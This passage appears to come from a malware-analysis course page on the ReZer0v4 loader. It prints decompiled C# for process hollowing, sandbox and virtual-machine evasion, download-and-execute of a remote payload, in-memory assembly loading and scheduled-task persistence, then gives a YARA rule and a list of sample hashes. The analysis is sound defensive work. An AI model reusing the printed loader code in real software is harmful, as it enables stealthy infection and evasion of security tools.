+ 6 + 6);\r\nint num10 = BitConverter.ToInt32(byte_1, num7 + 8 + 8);\r\nint srcOffset = BitConverter.ToInt32(byte_1, num7 + 20);\r\nif (num10 != 0)\r\n{\r\nbyte[] array2 = new byte[num10];\r\nBuffer.BlockCopy(byte_1, srcOffset, array2, 0, array2.Length);\r\nif (!Class8.WriteProcessMemory(struct2.intptr_0, num6 + num9, array2\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nnum7 += 40;\r\n}\r\nbyte[] bytes = BitConverter.GetBytes(num6);\r\nif (!Class8.WriteProcessMemory(struct2.intptr_0, num4 + 8, bytes, 4, ref num))\r\n{\r\nthrow new Exception();\r\n}\r\nint num11 = BitConverter.ToInt32(byte_1, num2 + 40);\r\narray[44] = num6 + num11;\r\nif (IntPtr.Size != 4)\r\n{\r\nif (!Class8.Wow64SetThreadContext(struct2.intptr_1, array))\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nelse if (!Class8.SetThreadContext(struct2.intptr_1, array))\r\n{\r\nthrow new Exception();\r\n}\r\nif (Class8.ResumeThread(struct2.intptr_1) == -1)\r\n{\r\nthrow new Exception();\r\n}\r\nif (Class8.int_7 == 1)\r\n{\r\nClass8.int_12 = Convert.ToInt32(struct2.uint_0);\r\nClass8.smethod_2();\r\n}\r\n}\r\ncatch\r\n{\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 17 of 27\n\nProcess processById = Process.GetProcessById(Convert.ToInt32(struct2.uint_0));\r\nprocessById.Kill();\r\nreturn false;\r\n}\r\nreturn true;\r\n}\r\nThe technique to load the next stage is called process hollowing. The process is created with 4 as the value fo the\r\ndwCreationFlags variable. This means that the process is started in a suspended state. A link to the Microsoft\r\ndocumentation can be found here. Next up is a check based upon the size of a pointer, which determines the\r\nsystem’s architecture. If a pointer is 4 bytes in size, the system architecture is 32-bits. If the pointer is 8 bytes in\r\nsize, the system architecture is 64-bits. This defines which API calls are used: either the native API functions or\r\nthe Windows On Windows API functions. More information on that can be found here.\r\nAfter that, ReadProcessMemory is called to read the data of the targeted process. With the help of\r\nZwUnmapViewOfSection, a view is unmapped from the process. A view is part of a process’ memory. A new\r\nmemory segment is then allocated with the help of VirtualAllocEx. The next stage is then written into the newly\r\nallocated buffer via WriteProcessMemory. To instruct the system where to continue the execution, the\r\nSetThreadContext (or Wow64GetThreadContext, depending on the system architecture) is used. At last, the\r\nprocess execution is resumed by using ResumeThread.\r\nAnalysing the rest of the loader\r\nThe loader’s current configuration has been analysed step-by-step, but not all settings were covered. This section\r\ncovers methods that were not activated by the current configuration, but can be activated in different builds. The\r\nunanalysed if-statements from the main function are given below.\r\nif (Class8.int_8 == 1) //false\r\n{\r\nClass8.smethod_0();\r\n}\r\n//...\r\nif (Class8.int_5 == 1 \u0026\u0026 AntiDetection.smethod_1(location)) //int_5 == 0\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (Class8.int_3 == 1) //int_3 == 0\r\n{\r\nClass8.smethod_5(Class8.string_5, Class8.string_4);\r\n}\r\n//...\r\nif (Class8.int_0 == 4) //false\r\n{\r\nClass8.smethod_8();\r\n}\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 18 of 27\n\nThe first if-statement in the code above is used to show a messagebox to the user, as can be seen in the code\r\nbelow.\r\nprivate static void smethod_0()\r\n{\r\nMessageBoxButtons buttons = (MessageBoxButtons)Class8.int_9;\r\nMessageBoxIcon icon = (MessageBoxIcon)Class8.int_10;\r\nMessageBox.Show(Class8.string_7, Class8.string_6, buttons, icon);\r\n}\r\nThe second if-statement also requires a function from the AntiDetection class, which already provides an\r\nindication as to what the function will do. The code is given below.\r\npublic static bool smethod_1(string string_0)\r\n{\r\nStringBuilder stringBuilder = new StringBuilder();\r\nint num = 50;\r\nAntiDetection.GetUserName(stringBuilder, ref num);\r\nreturn (int)AntiDetection.GetModuleHandle(\"SbieDll.dll\") != 0 || Operators.CompareString(stri\r\n}\r\nThis function stores the username into the variable named stringBuilder, which has a maximum length of 50, as is\r\nspecified by the second argument. This function resides within advapi32.dll, as can be seen in the function\r\ndefinition below.\r\n[DllImport(\"advapi32.dll\", SetLastError = true)]\r\npublic static extern bool GetUserName(StringBuilder stringBuilder_0, ref int int_0);\r\nAfter that, the loader checks if a handle exists for SbieDll.dll, which is part of the sandboxing application named\r\nSandboxie. If the username contains USER, SANDBOX, VIRUS, MALWARE, SCHMIDTI, or CURRENTUSER, the\r\nmalware also assumes its in a sandbox environment. If the full path of the loader contains \\VIRUS, SANDBOX,\r\nSAMPLE, or is equal to C:\\file.exe, the malware also assumes its in an analysis environment. Lastly, it detects if a\r\nMFC (Microsoft Foundation Classes/Application Framework Extensions) window is open, as is documented here,\r\nit assumes its running in a sandbox.\r\nBased on the analysis, the function can be renamed to detectSandbox.\r\nThe next if-statement calls Class8.smethod_5, which is given below.\r\npublic static void smethod_5(string string_8, string string_9)\r\n{\r\nWebClient webClient = new WebClient();\r\nstring fileName = Path.GetTempPath() + string_9;\r\nwebClient.DownloadFile(string_8, fileName);\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 19 of 27\n\nProcess.Start(fileName);\r\n}\r\nThe newly created web client is used to download a file to a temporary folder. The function’s first argument is the\r\nURL to download the file from, whereas the second argument is the file name of the file in the temporary folder.\r\nOnce the download has been completed, the file is started. As such, this function can be renamed into\r\ndownloadAndRunPayload.\r\nThe last if-statement calls Class8.smethod_8, which is given below.\r\nprivate static void smethod_8()\r\n{\r\ntry\r\n{\r\nAssembly assembly = Assembly.Load(Class8.byte_0);\r\nobject[] parameters = null;\r\nif (assembly.EntryPoint.GetParameters().Length != 0)\r\n{\r\nparameters = new object[]\r\n{\r\nnew string[1]\r\n};\r\n}\r\nassembly.EntryPoint.Invoke(null, parameters);\r\n}\r\ncatch (Exception)\r\n{\r\nClass8.smethod_9(0);\r\n}\r\n}\r\nThe embedded payload is loaded as an assembly. If there are no parameters for the loaded assembly, an empty\r\nstring array is set as one, after which the payload is executed. If an exception occurs, the process hollowing\r\nmethod is called.\r\nFeature overview\r\nUpon refactoring the fields in the main function, as well als all called functions, one can clearly see the loader’s\r\ncapabilities in a single overview. The refactored code is given below.\r\npublic static void Main()\r\n{\r\nstring location = Assembly.GetEntryAssembly().Location;\r\nif (MainClass.shouldSleep == 1)\r\n{\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 20 of 27\n\nThread.Sleep(30 * 1000);\r\n}\r\nif (MainClass.shouldDisplayMessageBox == 1)\r\n{\r\nMainClass.DisplayMessageBox();\r\n}\r\nif (MainClass.shouldDetectVirtualEnvirtonment == 1 \u0026\u0026 AntiDetection.detectVirtualEnvironment\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (MainClass.shouldDetectSandbox == 1 \u0026\u0026 AntiDetection.detectSandbox(location))\r\n{\r\nEnvironment.Exit(0);\r\n}\r\nif (MainClass.shouldDownloadAndRunPayload == 1)\r\n{\r\nMainClass.downloadAndRunPayload(MainClass.url, MainClass.downloadedFileName);\r\n}\r\nif (MainClass.shouldSetScheduledTask == 1)\r\n{\r\nstring path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) +\r\nstring fullPath = path + MainClass.fileName + \".exe\";\r\nif (!File.Exists(fullPath))\r\n{\r\nFile.Copy(location, fullPath);\r\nMainClass.setScheduledTask(MainClass.fileName, fullPath);\r\n}\r\n}\r\nif (MainClass.launchEnum == 4)\r\n{\r\nMainClass.directlyLaunchPayload();\r\n}\r\nif (MainClass.launchEnum != 4)\r\n{\r\nMainClass.launchPayloadHollowedWrapper(MainClass.launchEnum);\r\n}\r\n}\r\nThe sleep option, and duration, is used to evade some dynamic controls, as it simply waits. A system where teh\r\nsleep function is patched to not wait would avoid the delay in execution, as there is no further check. The loader\r\nhas the capability to show a message to the user, which could be used to display a fake error message.\r\nThe detection of virtual environments and sandboxes avoids the execution within analysis environments, unless\r\nthese are hardened to a certain degree. The option to persist using a scheduled task allows the malware to set the\r\nloader within the start-up, which is likely more concealed than the actual malware.\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 21 of 27\n\nAt last, one of the execution methods is chosen, where the payload is downloaded and executed as a new process,\r\nit is loaded into the current process’ memory, or it is injected into a hollowed instance of another process.\r\nConclusion\r\nThe features, as described above, show that the loader is capable of a variety of actions. Which actions are to be\r\nexecuted, depend on the predefined configuration. The decryption of the embedded payload happens directly at\r\nthe startup of the loader, as the byte array is defined as a static field. As such, the decrypted payload is present in\r\nmemory before any of the checks have been executed. This means that antivirus software can be potentially\r\nrecognise the payload in memory before the execution happens. It also means that one can set a breakpoint on the\r\nfield of the byte array and dump the value its value to a new file. This evades the loader’s additional checks\r\ncompletely.\r\nFinding more samples\r\nTo find more samples, one can use the following rudimentary Yara rule.\r\nrule ReZer0_simple\r\n{\r\n meta:\r\n author = \"Max 'Libra' Kersten\"\r\n version = \"1.0\"\r\n description = \"Detects ReZer0 loader samples based on the characteristic string. This rule also d\r\n strings:\r\n $string1 = \"ReZer0\"\r\n condition:\r\n any of them\r\n}\r\nNote that there will be some false positives within the hits this rule gives. One can either modify the rule to ensure\r\nthat only Dot Net binaries are included, or simply perform a file type check once the results are in. In the past few\r\nmonths, the following 215 Dot Net samples were found based on this rule. Note that this list is not an exhaustive\r\nlist. Samples are listed in no particular order.\r\n01a083f468e17d5da38d15907e26a71ce4ec6ee575aa5069e090e3d325f855ce\r\n02126a53d57770a8d7ceeb49ce4d653840bb9fd27cf89cb6e03c7b7825e83aec\r\n037edb7f6b7be6eac0b9b858bd7bbb7fec6864c32a6e4f5e542557c395d130e5\r\n03c27b0f45e222123d76ed5a54538bb27ae2739644567985c8f52216b783116d\r\n03cb9a030d70871b55b2b60be423496a52d536dbd07a94b5597d7395cd0ec130\r\n0427ebb4d26dfc456351aab28040a244c883077145b7b529b93621636663a812\r\n0567fc5975496aae7239c54d82cf8c7ca02324c3cf69f3e03bc1ed4bb7615e38\r\n0594281f0bf26b63e806ab6463111cb414bb227be98ed9c864921e028db370e7\r\n059831a6b243de4633b47450aa2056d92659954a98cd0919f784894c5f97735b\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 22 of 27\n\n06334474b86b979e88671df791216e8f1ea69bda88132c43a7e688059bdd61c7\r\n0874af8b719593b48b71d0dfbac611d9d3a411553952c95298eb56c83e7e65c7\r\n0879d6bf5a0b22bbe3997db6e8d1b80277abe8ecffe49797726f840a0faf1655\r\n0ae4a17ca6b29c9777c12f706ea66538a19b46aae1adf8aeb0872a02d5152d86\r\n0bcdcaa79f07bfeda572fd367cde1d4efd22751d5de74c3f3da94431ffbbde32\r\n0c5a03e7fdfa7af35760ebc391397e164bd83916d3b3abecfdf0ab9914f48d5f\r\n0d6d77c271f43365b306b4b1604d5bf1d9a657d7b68c142da9b34ce9ef9f50da\r\n0db247297704b25ead74f6a22fce3830e47a51954d2749d22d29cff28e20dddb\r\n122f9630b6f23058a731f70bab4f964a5a9af2c0794561c20f0b925f308ecb8b\r\n132882f01766ee5d565f81720badae5a6501a44d475b7a6f260e7d11d63242f2\r\n13f85e9c4a868c062366c91654bab59c8bfbb8a1c4d559a93f00c5973c6b4b4e\r\n141716e121693ef2dfbf835ad2738e4aa03f282ec045f773a860f81fe09a7580\r\n145a6bb84e05df55cf461b21f35a5e9683dbdfd9bc53d5b64492b81b23ac5dac\r\n196515d80efc868e36024fa89ad8b957919c72a6cf2630a108d328d9ce334e84\r\n1a455ce731fb03854a06a0d39341c27c1702ef2eff0669723642fb2e373a4c8a\r\n1a675194586590cbc8a0fb73ac644ee6044df170ab3a5aa5e06413175baed53a\r\n1b15c51ab450c1137f8d06073d4bcd250a33450b67e74a0de9ee32aadc4197ed\r\n1cbe5684a8e5de5f1b58df53c71c52ef3efdd843894771c868ebbe5fd651c342\r\n1db2f861a82ed5a18be099511b67d50f1109270670cff7e2f05d16f9c52731b0\r\n1dcb387f747b57b78cfd744084b6c26c931f1d339a7495cb3b1dc847e0588a60\r\n1e7316070f133697282add757c5b3639c52326781b86f89f89414c8938a81ba4\r\n1e89177e0a2c338ba08c5b1b1ca542994fa4aed4f777a267bcde6c3b33192c45\r\n2083bfde777e44dc8e6ccf02d26ae0321275b53d861f518af5dbc18eb042888e\r\n21a3015f45ebf19aaacf11291bbeedca9066731e0b855ecbe9a8d60d68063f45\r\n21e5e17fb0f7bc9737127faf8932b3fcd24087ea60fde886f9854fc6f8b4889f\r\n23ffde0278f5e47344b6f3fa670bf87e4207382713cfc126b349b00dfc7def78\r\n242de59bb0b86082a0d5aefb1b1dbd660a80ee845d29ccdf99f162fb7f80d807\r\n2638315ffbb558ab6186967966f888a8d06bc72a8c8fe493b52c45daeae7f069\r\n26673df0aece41d07e776bfc2681b126ceff848ee7a3ddc9008a389fac49ef7b\r\n26fb04d6e6f799d0145067e2f394ceae049e63e534955a77ce88fae649867d24\r\n2707399dd39fe29624d00ef2191657514b57f778eabc2514c3d0469d18e00778\r\n2d632bc1f688e0a1bd2fb4388dadfcddecbf6440f5d5e1ff5b3e9b23fda39286\r\n2da089882ca20b05fbaed886857178c017e77c483830825ce4931f6d326458f4\r\n307b0a2b4d712fb1536a07501d68880c089f14d1090871125a2b00f7e24878f4\r\n309c26b05366f76eb05ecc0136e78defb25c2126912ceaa465ea4d1481640dfa\r\n3109f5cad61c34b0fb8cb5d206985acfd49b18c0555114a1a07c50edb5faf3c9\r\n32d43005ed6538d97d1b0b23c2ffca32d3fae2a2ec60512185949b8f27f6af51\r\n35ac50c7664157e39486f14ca358e4266a2afe05aad566611999d0b370ba19c4\r\n360255607e8f7f504f50b4835446f4f237847ae20613ccf11a6cad3c511de7a0\r\n3794564406ba74b6f80a7935a3fc237434e5d17e65a750034182abfdbaa3a1fe\r\n386b237bfdbbd857b5ee9ec48b049f8ab78f89e8b191b20673e284ef570813f0\r\n3acb95b8227a51a21fc62bf686ee4f0fa1e438a75b086e39f77fc4c3b899bf02\r\n3c064e533168ecdb16668d2b718976f1c432344a9338dca096d96c7c2eff5fe6\r\n3c1eb274d9837f8f7388e9718fe3d502209348f8c815d91f1542e986196a3dda\r\n3f39da1d33231e5e5e350ad3c4b9793f8c11bb070a59332fc96d402a9af2d620\r\n3fd12193ca5410c78d2b40f626472dcfd10af1f910be801fbd9b8305d4536f5a\r\n4032835913b5dbdd4d6939af499bb3524b65eb6168854b479a254c43f2cbfeb1\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 23 of 27\n\n40b456fda43b1814c0ebae14e6f738c2a40c9021ef182ea37ad9c0d8a090988c\r\n41f684a6e95b6b1d86123dfa86f49e9b0e067df1ea86a23670212a3d3acfff35\r\n425c87caaf0c770da2445fa1a8373a0a212e318804e2ca27c6164406f9bb8528\r\n4272f3e3e24fb2a3b5322911cfe576ae94cbd359714f0f14a906fba73542d073\r\n42939c6924ca953643445380a1cb4cb9d8b6a7175d4de25c9f9e874d03d1297d\r\n4302db9abfecf47efd98b77d57ed0a1188f645f63493b3eeb97670e3bc2305df\r\n4372059a9390e87f7545a768aee891ede629933e1f72866d02063921f5b82c4c\r\n43d334c125968f73b71f3e9f15f96911a94e590c80955e0612a297c4a792ca07\r\n460bc024c65521a5c83ac2cb7c5c49fee25320e9d00e8f7de315d1966096586b\r\n46222f6e314780cc9163276be59a66b966700193eb61aaf68b44a0c1166ef0aa\r\n463c02635e0c169bc9c5b7af2e02dabfc86f6026c9ed76633504bbdf4b360e06\r\n4756ba58fb2d8021a0716fe8f94948dbd1cc05d9819943e268d04706ee299b4e\r\n4968355153e18118bafcd4492e2781a3166972841a0bc21daeb4da9e71d5d194\r\n4b07511148ec8abb1c7589a91acca7120284dc53ff876c187567baf54fe619c7\r\n4bf81de605db9154fabe31aceb662c0b6bcc527df5f31ec54557f2dafc566300\r\n4c9a4fd69b74584c1e2b706640aeeff23dca3c5c06cf5d8e8c28accccb2c3f9e\r\n4fa975b614bfcd6810dbbebec3d3ecccdeea616a5b2ea557180c33a05d7e8185\r\n4ffdb2b7c2128314a0e2c0e73fc0f4fb7c27fee7316e6df3a3b9068b9960daf8\r\n506d817f0cc6319d836dcca44e1e7411550391f2667f85da037f38ec5ec12b07\r\n531048dbd5a9c25bd66cdfa75dcd34a8073f57a8bcf42e817c99b20d72ab92b7\r\n543c2d969fd1a253c4f31b466cf6113aaa83b5152651a49b5317aedfc02365c4\r\n54dcaf9ca6d34225223e050bc57b552b1f42b4e3f5020e0657591667f1cc3661\r\n586566b4fd7cfe8594a50d84627d99145f38bfd43015c321f8fa35dca77a39e5\r\n598ae303e71cd16163c79a60b798ef5f2e5f0fd9aa74b16991a335d40d38b1ac\r\n5a309fcd09092bd21ea6215b470d439d9c2aaf875f70553aa627f4b5b41b3e38\r\n5b1c5c6e6c90a2d393b8cdca5f13ba576771455048db2c0a2b86a10e38272e94\r\n5db1a826ce4bf87ac4de357d38236f1525bc3cecd9b7166a672c24265f195447\r\n5f909b33632f4d6c525b9d673528b19fba4b9a582813b195f2c8eba42eafe28c\r\n65bc882b4c5535a2ab6bb9fd8efa09fa9830af8c6e3139652a218569cb7d6c8f\r\n65cd227e755f90a9abc8c3b17be256a4f470c3289f074e5244dcaae3edfaf192\r\n669c387e3b1a2fcdd9db5df37411f182d4666afab3c54d223bd1ae76e53210dd\r\n675ed8df1890b0dd35274b66cf412879e06cfbefd0e90ebaad01099effa61a07\r\n676d418357710dc9f1aec326bbb8e81d2f826d8f884f41a135e1dcc9a81aa706\r\n6908b29b8f3c4aee485a8403d2033724e7e014f2f4273d53788284a04fd4ac8e\r\n6c8d4b0f77c70871b34ac2f132badf8a651759d38ee25112d644d1b863d30b3b\r\n6e7d71dc2095151550803c46a0ff09a637dff48b2fa34a822533bad35e6a1c8a\r\n6f61c6d3721d6c2fcbd6909d478531dc94175ee70f88eba9a3a552207265e565\r\n6fc7835f47fd33bc7d37fecc081267a5c196f446f0c5c9de852e83030b8801c2\r\n70ddf58a281289ae72d4d1b71d53f0874a13b1475400f1c3f890063daf52f73b\r\n70ff6f075951b90c2e8a33d04c1615a40e1582d520b7ec75cad5a07e11d2eb43\r\n717942847e0a74f7de1b908d3edb0c77406d05505625b9117e0d03cbfbfa9952\r\n725b0e7301361fa4f653bd3261fd41cb9960289c93035bf537642fdbd5345d1f\r\n72f8c9d49fced2ed0b037132201d69cc08a4379e5bff8101db9abced6f06ec59\r\n75697b293e69ef30eeb26625b4c1b01d650ecac4c634cae9c02029229bd12565\r\n76aedc3dffef1db76c804b34edec68a7f69d6a8aac824c266edb95cf37e256f7\r\n7739baf5ad9b83ae17427f9b4159b1eaf735e899cad986fdc853f100d833ac8c\r\n777b034f45253bf82c2956eae77b2da80a1210f35dd5e0fc1c2874e06419a37a\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 24 of 27\n\n7814b2a1cc586ddc6f16206eef3608af23cc464299b5ed10625851eb20c10132\r\n799ca1f58f6215bc671bdf5a78704fad9a475f318c50552e1b1858249c104f04\r\n7a1e0759b2176d55a2a060e1511693fe9ec2b0d3bedf5fb33b74af2f772cf9f4\r\n7da6dc83a72d0c2224d9d283c193570317486482c5754eb17b077bb575d2e2ca\r\n7db4b9e1e55b4874216dd98618f794d6da3294651041ce0a296057550b4e18d8\r\n7f91e428fb1a842ebf65c3d12131e4d8049f3c43515d381a875f6d59b2246cd2\r\n816ece321b499dd2ec270ecf3e203c179fa85e0be3778bbc4f6c10559a5f15c5\r\n81f985a5f2ebf500ce3f6a5a2710972d49212e495a78002e02ccc0c6651b19ae\r\n82a0c593f7f677761c48b51e542d3d9c9e22f8ae5b5924c7dafcf70d1c02eb69\r\n82b6d44d9508383769de39d865987126e144886a27f0b86f60d83b6102f02524\r\n8311125e5d8cd9d306fd3ced77d9d2db3a0bb4a06343f8629a1c379336f86c12\r\n832c0ba5bd62ffc5469d7fe7c9a4006f9f6dbecc58e3b1051134029c75e25c06\r\n834a2feb8e0de92cd9df49fde8efa69fe3f995b1328e97e0154e4580e8cd9828\r\n861c6fd47cf1343d53ec3c1e8b3380ccb6d90d8a585cdfcc4d535c271e5491b2\r\n87baee78bcee68c2f3408e3f25142604a7428bb23e5c532522dc8a6553e3f5c4\r\n8aa9f6f4ec149a7d062514dc74d892eb0dc3c6d99ab14b9a4db0aaf4545ad558\r\n8cf41f5bb50252da646e54d127e546ef7469ab60ac6b1503c5cbf932b0a8dbae\r\n8e58e292811cf9c8bad65ce390f5bd80e34767778655549a8d375606251d08cd\r\n93153f722d7b3edb4152b2ab39df9cbe60abd2f08d455954d7346a7a3aba69ff\r\n93b49505d9e66e100e14da68d5d5fedd5772a8930769694f22b79a00d2fb7ce1\r\n951867b66950ebd3c9ddfc48c1d4e19f5f4d29cb88907a20ccb0b9b4534bde06\r\n95a7c5d248428288391106d7c5cfb756a6f8d6fcd8487bed2686f33ba929b49a\r\n965d7ae9b056fb6aa3a2075074cfae23149451c876dc6ff98c0094b4273a2d37\r\n96733020de3c227af482d7e1d639841e4e55a7499fd3ac301a1714da47d08077\r\n9693cf5c737a8f5bb69135a1dcca034ae136a1025722a794289a13ec4e02f17b\r\n976246964e4f7c3dd64aa0867384b9c75f101fe7e17fe0a31edf14401f2e69dd\r\n97f2e151b450c57982ba85b75825a70921b6886a4531c4ca36b3c4cb0d84022e\r\n9851c08bc9676ea3a6cd443301d39540c9692efa78445bf313eb8555fefa7293\r\n994894669c3f37763d8563ccc54f5d221b479e18eebb138adca8e51a4d4ed6be\r\n995d704d36f66270ce5a9e857ba990219ae8fce5c952cfd9bb8211421175fa53\r\n9c736cdc07b69d7c8cc9754d5805513b23ecc31bf5f6747129ebdc90992cc644\r\n9c90108e99e00227560c30650f39357010741a25e8eb59615dd7ffe11ab40bdc\r\n9eb468cc670a874d1b1ef1528fbda9d635fee1f5f464ed738057f5860bc617b8\r\na09fff6fe9a91237e1c177c83b82ca90787a1cd3bc3f788b76f93d93c29ab301\r\na4421518998ae78586784b9112d5c3eed033e0b96236e97874a5b1bd63983481\r\na5b9c20140deb5e446614d701005a0292b38e7aa8c89793501ecaa92b8873f7c\r\na64d9529bb691533961831662eef5357b3211c3001eac191b00e9d4f9d4ef573\r\na699ce0401ffbbf75f06b5d80a1049d0df4cb05a9e9255b51c33e26a8d1e85bf\r\na91e13d39002aa788bfe354ffed938df580ae253a94779899b114406efecfe57\r\nadd54ba9b915fda7fc084b7cb1376d80b18e5c65537fc5948be3be839e5a4dd0\r\nadf56bdd74eaa4fc2781ed5d5017954fe82c7c9cda1765446d45f9d6a95c6b97\r\nae28aba0a523834b4e65b4582ba1b904c6c6018aeeb7127a6677844afca30507\r\nb2213fd3e5544d7d0cd916b2a647f370bdd94043d5d534c9f1642a8f56e4dcb7\r\nb3374e53742c199040720ef71acced1aa50084beeec10a0019438be697dfe2e4\r\nb3cc8d0df2409bd1775d4130c6fb80b8c8928919b6608c7b8744b18620ec3269\r\nb40f2c3846aa8b98c74dc3832a6b42f4e724be89b19f77fe33a64e048c5aedf8\r\nb41900977df0932f927f41941ba3a3bb46b9a30bf2ebabf50f2fb228349e53fd\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 25 of 27\n\nb63deb21e5989052f68d44829f9434dedb0d3caa486d89992c2da8026a8c27c1\r\nbb940b972d860e8d337a75dd72d42b6cf8cfbc2f7a7c9c3ee5a28a044b282f97\r\nbc43101289317f92d229022a3457d9d3583f8838ac39e4d22375b0433b12e392\r\nbe1f9e80cd54d6b18adc48a8c703be3ee09215033dba48fc35222ee84847d855\r\nbf74135798a8d92c26d156d371e2c0dbe928ca4798f95d286067ed8e6460be87\r\nc03013381071aa4075322d81e33b4a27a3308eb822896338628e6ed4cf82e8ec\r\nc11dc1f2cf0f56ff8d3c724f2da89a6ee4322abd757eacad8741d445adb46f70\r\nc238f7533cb57a82be1b45aa5aafabb707e1a6d550bd6ac57e5cad606cbcc7d0\r\nc266b07e32f35c2052315e46a1b5b03c0a1bef5c3190084b3c83a4d668a5446d\r\nc6c45a792898faf5a43305ceb0594e75e898415586785d04719e609e0f960658\r\nc8da1e1e8dc52207d2c13ad7203ed7c7dbf140b46f33bcf051b2e439c6fc0359\r\ncc6288e031644381f4a657cf3467389556ba8a491513d623f1b956cb658ed941\r\ncc9f4b05da1761ae612ca3d43f01372372754c51369f5dae89e31335df2cde19\r\ncd067580559e75a1752672062c8800efde95ecf3199958f42f3a093e6f4d2348\r\ncd3e0acd48c00160aef237d77796fc595bdfbb97f129d272f62e9fcd3669392d\r\ncd562b62e1676f3804aa638e599fda04907dfe7cac27d3a4daab19ab89307704\r\nce3617d695e2973ce7d231cde8d059073779974d349efb93fd9ece1c2a3dce38\r\ncec2799b2ab815e849d7b6a3e2117665b30280e6229a09e93dad4baafc253637\r\nceca379e58677e9a40263d26cf8d5a13b48b5e7ca9132a9f04cd744212320666\r\nd0b6e1f1970d7c5226c2529b2a43e805ac3b84b1fe73d6d5f6ff4d8b8cbff9e3\r\nd1e4e915d7a8e9048a870994fad5c6f13b060e378c700a516f0e9c1d4b1e191f\r\nd20407ff596ff0c130423ad2e87b19b7573313bb0631c9a0b30a79d200fa8070\r\nd3555c2dad0ed7b65262990cee241d0d38868858727caf097de2722c94b55310\r\nd55eddb96fe9b54c7c340cdc278b7f2beb3c41a3ce2daae97dcc19ef6195ab61\r\nd5d2a14d3c1b5f56cce643446d7323b1583e9de27f7c97989064bf382bc9666a\r\nd6bac9c0e5b9dcb2a40448e06435fbc1b838a973356917b7822d4f761fb9c966\r\nd75b3f4c917b197c6a5b91a84e4c38a040942304abc1ef312cf7515be1f5a4c7\r\nd8a8f6601c4282d6d5f9dcd3c8307f1799e811332c163c9f9a59921858c60944\r\nd942d1ecdef649c09334b0bc9bf071c328be533fcc9d1252c7b37d8c871e3f57\r\ndb2b38258707432f6ff76fec06aa4150cd8eb57994ff23863078efab2bc42e10\r\ndb317b170f63cefc08b78067bfa228b3137ef4c782349752c0574fef93547d46\r\ndc2df1425819338890f1b7f930464403337de989ec5a915933327a61aa782567\r\ndc70c250277197090e4c6532e8698632e93f69683f2b1885a312db1e74eb979e\r\ndcad7a3f38f2844026e74c082b13ed0941d97d23f307af7eac217eddadc633ea\r\nddbf9cbb3afd10cb352908602dca634c7d9125d475b64ae9cfe00e770b5eefe7\r\ndddf1d151c75e99e7db3d1bacd9231722f9cf6301eb3b02c54b7ab08c81052a1\r\ndf3876c45a75ae7777b2f1187965ccbe4a2c6007a428f3893c60bc7d3b8f0bd4\r\ne265215c611c3b54c213f8fc735b55f36dff10b2b7bbeade878cc09ed8f47845\r\ne2ca9576635581fa73563929708f85e2ffd566d959bf891574457464d16c8d99\r\ne45e5e69d5e8f56b910a01fdf953ab64ab824723f114b98dcacfc41b90c6b72e\r\ne47a98982a1c49904fdc7b5f858a259e87f827824debd3449ff7adfe488f593e\r\ne4cf2714620a962a20c7fe1c08787d1ded8cc348f33961d27367dd8e21dd4d27\r\ne505f54b2a001a237d2681f1c1acf619d300fbc555e05ff42611bbb17200194a\r\ne59fcb2edbaa74a89dfee201757482ccbc25f067b4429da083d81c8d529cb547\r\ne6259f36feb31953c5c0a8efc1d69c2c4da0c5042f2a05fe94c8a8f6343ba909\r\ne74eccfad5c4682dcd6fd49591b6142e72f4a4578be0fa9de00a611f04bfa51b\r\ne79a4eb2699d087548756b496d8acdd781456ed70a7f59c4ef2556c76a978de1\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 26 of 27\n\neb8a190d4aad107344cabd071b753af15efa046e3d828c6ca75995b0f376678b\r\ned5e53d2aa072602f725011932ae5231123d4bf4f9f6dfc5d8e48a0199521787\r\nef4f9107c7578d569f23d00cf843fd6de85321d9edb318dba4e23150cc18e553\r\nefe02909ea9de84674a71d7b94d44fbd2740cf4e5cabd2a8a7bdcca64a1890d3\r\nf0abdfa1b94bead0a15d9e7bc4936584a5b429907a6e387057d33d2cd2af2623\r\nf0d3b72420ac70a5f588714fa74c3cf208cc50a230ac9bdcb6e45539fce59f54\r\nf1a3f2342a4ac220bae32105a0ba6d184c62592521b235bb441dfb69a62fe128\r\nf252f9171c9090d790de9b83b17de7a91487831f4466bd3211613a8bdf859349\r\nf3645898e7a5007198e45532154fbb21c02f8082f0a1c1d0bacb5f71e060dcd4\r\nf3d31c8437fbd7323084a5857fb595dddd9e5eaeaaeda5e8300447258ce1411e\r\nf40da9b9051827d10c60a46282991766577042031f4137c8a6f4103a9e70a9d4\r\nf56be0122d17f05ab4204cdaca92b3de8ff19565a6dcd47968fb105cdc76c663\r\nf76cadb9b5184b8ab706e1663fc914963d929b243c6d05952af859981f87651e\r\nf8e4776f34205dee4cc0b3b8c8b1d48e54267eaf9f9134c352fc3db146380ac6\r\nfa3a810a2d1b136c294680a9f4bbc2e4f4e23450f60dea6bf0ab552f6d225df7\r\nfea7212ee125154df700ea97977650757c407e42de052bf5be4782d452a0c817\r\nfebed3a1a4bc182dd6687942266b8472528431f149fb76bb050d692ccd30f591\r\nfee200315c5484c9b66e1070590d8988df8fe28f85a9a2c8d5d0350529ce9d9a\r\nTo contact me, you can e-mail me at [info][at][maxkersten][dot][nl], or DM me on BlueSky @maxkersten.nl.\r\nSource: https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nhttps://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/\r\nPage 27 of 27",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
